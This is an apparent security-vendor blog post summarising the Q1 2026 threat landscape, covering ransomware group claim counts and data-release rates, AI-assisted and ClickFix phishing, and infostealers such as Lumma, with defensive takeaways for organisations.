Get MILBERT.ai FREE for 90 daysActivate Now
    Back to Blog
    Threat Intel

    Q1 2026 Threat Landscape: The Pace Has Not Slowed

    James McMurryMarch 9, 202610 min read

    We are 68 days into 2026. I want to put the current threat landscape in context because the numbers are not getting better and the methods are not getting simpler. This is a look at what ransomware, phishing, and malware activity actually looked like this quarter to date, where the trends are heading, and what it means if you are responsible for defending an organization.

    Ransomware

    We tracked 2,522 ransomware claims from January 1 through March 9, 2026. That is more than 37 claims per day across 81 distinct groups. For context, Q1 2025 produced approximately 2,063 victims by most tracking estimates, and Q1 2025 was itself described at the time as the worst quarter on record, more than double Q1 2024. The pace has not slowed.

    Qilin leads Q1 2026 by a wide margin at 405 claims. Akira follows at 173, LockBit 5.0 at 172, Gentlemen at 159, and PLAY at 145. Volume alone does not tell the whole story. What matters operationally is follow-through: did the data actually come out.

    Top 5 Most Active Groups — Q1 2026

    Group Claims
    Qilin405
    Akira173
    LockBit 5.0172
    Gentlemen159
    PLAY145

    Two-thirds of all claims this quarter, 1,714 out of 2,522, did not result in publicly released data. That number needs careful interpretation. No release does not mean no damage. It could mean the group is running a pressure campaign with no real leverage. It could mean negotiations are still active. It could mean the victim paid and the group deleted the data as agreed. Payment shows up in the data as silence, not as a release. A 0% release rate tells you nothing by itself about whether the group is effective.

    CL0P made 108 claims this quarter with zero releases. Everest made 52 with zero releases. Whether those numbers reflect successful extortion, empty threats, or ongoing negotiations is something the raw data cannot answer.

    On the other end are groups that publish data at very high rates. SAFEPAY releases 85% of the time. Rhysida is at 82%. PLAY combines high volume with 66% follow-through, 95 releases from 145 claims. If one of these groups names your organization, the probability of public exposure is real.

    Groups Most Likely to Release Data

    Group Release Rate
    SAFEPAY85%
    Rhysida82%
    PLAY66%

    Nine organizations this quarter were claimed by two or more separate groups. That pattern points to one of two things. The initial access was sold or shared after the first breach and a second group walked in through the same door. Or the first incident was never fully remediated. Either way, the victim is being targeted by a completely independent operation using a path that was never closed. Containment without root cause identification is not remediation.

    213 claims used only URLs or redacted victim names, which typically indicates active negotiations. Those are organizations currently in the middle of the process, running down whether the threat is credible, deciding what to do next.

    Phishing

    Phishing is not the entry vector it used to be in terms of simple emails with bad links. The mechanics have changed significantly. AI has solved the attacker's scale-versus-quality problem. Generating thousands of highly personalized lures that reference real names, real relationships, and recent activity now takes minutes. The Anti-Phishing Working Group recorded over one million phishing attacks in Q1 2025, and volume continued climbing through Q2 and Q3. The trend has not reversed heading into Q1 2026.

    Business email compromise remains the dominant form. In 2025, BEC made up more than half of all phishing attacks. It works because it does not look like phishing. It looks like a routine request from someone the target already trusts. Finance teams are being hit with coordinated attacks combining an initial email followed by a deepfake voice call using the CFO's cloned voice. Two channels, two points of apparent legitimacy, one wire transfer.

    The delivery mechanism keeps expanding. Attackers are no longer dependent on email. Vishing attacks increased 28% in 2024. Smishing rose 22% in the same period. QR code phishing is growing in corporate environments because QR codes bypass most email scanning entirely. The attack arrives through one channel and executes through another. Layered defenses built around email inspection alone are not enough.

    The technique seeing the most deployment right now is ClickFix. It presents the user with a fake CAPTCHA or error message that instructs them to manually paste a command into their terminal or run dialog. The user executes the payload themselves, bypassing browser protections and endpoint controls that would have caught an automated download. It is effective because it turns the user into the execution engine. It is also the primary delivery mechanism for Lumma, the most widely deployed infostealer active today.

    AI-generated phishing emails in controlled testing have achieved click rates around 54%, matching the best human-crafted spear phishing. Phishing-as-a-Service platforms now come with AI-driven personalization engines, subscription tiers, and customer support. An attacker no longer needs technical skills to run a sophisticated campaign. They rent one.

    Malware

    If ransomware is the headline and phishing is the delivery, infostealers are the engine running underneath both. Infostealer malware accounted for nearly 62% of all malware incidents tracked in Q1 2025, more than four times the frequency of the next category. That trend has continued into 2026.

    Lumma is currently the most widely deployed infostealer. It operates as Malware-as-a-Service. The buyer gets a command and control panel and handles their own distribution. Lumma is commonly delivered through ClickFix lures and fake software downloads. It targets browser credentials, session cookies, crypto wallets, and cloud tokens. A stolen session cookie bypasses MFA entirely. That is the threat model that matters most right now.

    Microsoft flagged in early 2026 that infostealer campaigns are expanding rapidly beyond Windows into macOS. Cross-platform variants written in Python are accelerating that shift. DigitStealer, MacSync, and AMOS are all active on macOS. The assumption that Mac endpoints carry lower credential theft risk is no longer accurate.

    What infostealers steal feeds everything downstream. A single set of stolen corporate credentials gets sold to an initial access broker, who sells access to a ransomware affiliate, who deploys within days. The connection between an infostealer infection today and a ransomware incident next month is not theoretical. In February 2026, Hudson Rock documented it directly when a Romanian oil pipeline operator was hit by Qilin ransomware after an infostealer infection provided the initial foothold.

    SocGholish is the most common initial access tool in the current landscape. It is delivered through compromised legitimate websites connected to a traffic delivery system. Visitors to those sites receive malware. The access is then sold, most commonly to ransomware operators. It shows up as a normal website visit. There is no phishing email to catch and no attachment to block.

    The VOID#GEIST campaign is worth noting as a case study in how the current threat environment operates. It used multi-stage PowerShell execution, in-memory payloads, and scheduled task persistence across Windows environments. It is also a useful reminder that threat intelligence quality matters as much as threat intelligence volume. Not everything published as confirmed is confirmed. Verify before you operationalize.

    The Through Line

    These three threat categories do not operate independently. Phishing delivers the infostealer. The infostealer steals the credentials. The credentials get sold. The ransomware affiliate uses them to move laterally and deploy. Data gets exfiltrated before encryption. The claim goes up on the leak site. That is the chain, and it is running at scale across 81 active groups at 37-plus claims per day.

    The pace in Q1 2026 shows no meaningful deceleration from Q1 2025. The tooling is more accessible. The attack surface is wider. The methods are more automated. What this requires on the defensive side is not a different philosophy. It requires more complete execution of fundamentals.

    • No released data does not tell you the threat was not real. It could mean the victim paid. Treat every claim as credible until you have evidence otherwise.
    • Group identity changes your response calculus. SAFEPAY releases data 85% of the time. CL0P has released nothing this quarter. Those are not equivalent situations.
    • If you were hit once, assume the access path is still known. Remediation means root cause, not cleanup.
    • Infostealers are the upstream problem for most downstream incidents. Session token theft bypasses MFA. Monitoring for stolen credentials in the wild is not optional.
    • Mac endpoints are not lower risk for credential theft. Cross-platform infostealers are actively deployed and expanding.

    The threat environment in Q1 2026 is a continuation, not a new chapter. The actors have more tools, lower costs, and a wider attack surface. The organizations holding the line are the ones that have closed the credential exposure gap and built detection that does not depend on catching something that looks unusual.

    Ransomware data: January 1, 2026 through March 9, 2026. 2,522 total claims tracked across 81 active groups.